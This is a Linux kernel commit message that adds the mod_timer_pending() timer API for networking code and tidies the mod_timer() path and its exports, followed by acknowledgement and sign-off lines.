Impact: new timer API Based on an idea from Martin Josefsson with the help of Patrick McHardy and Stephen Hemminger: introduce the mod_timer_pending() API which is a mod_timer() offspring that is an invariant on already removed timers. (regular mod_timer() re-activates non-pending timers.) This is useful for the networking code in that it can allow unserialized mod_timer_pending() timer-forwarding calls, but a single del_timer*() will stop the timer from being reactivated again. Also while at it: - optimize the regular mod_timer() path some more, the timer-stat and a debug check was needlessly duplicated in __mod_timer(). - make the exports come straight after the function, as most other exports in timer.c already did. - eliminate __mod_timer() as an external API, change the users to mod_timer(). The regular mod_timer() code path is not impacted significantly, due to inlining optimizations and due to the simplifications. Based-on-patch-from: Stephen Hemminger <shemminger@vyatta.com> Acked-by: Stephen Hemminger <shemminger@vyatta.com> Cc: "David S. Miller" <davem@davemloft.net> Cc: Patrick McHardy <kaber@trash.net> Cc: netdev@vger.kernel.org Cc: Oleg Nesterov <oleg@redhat.com> Cc: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>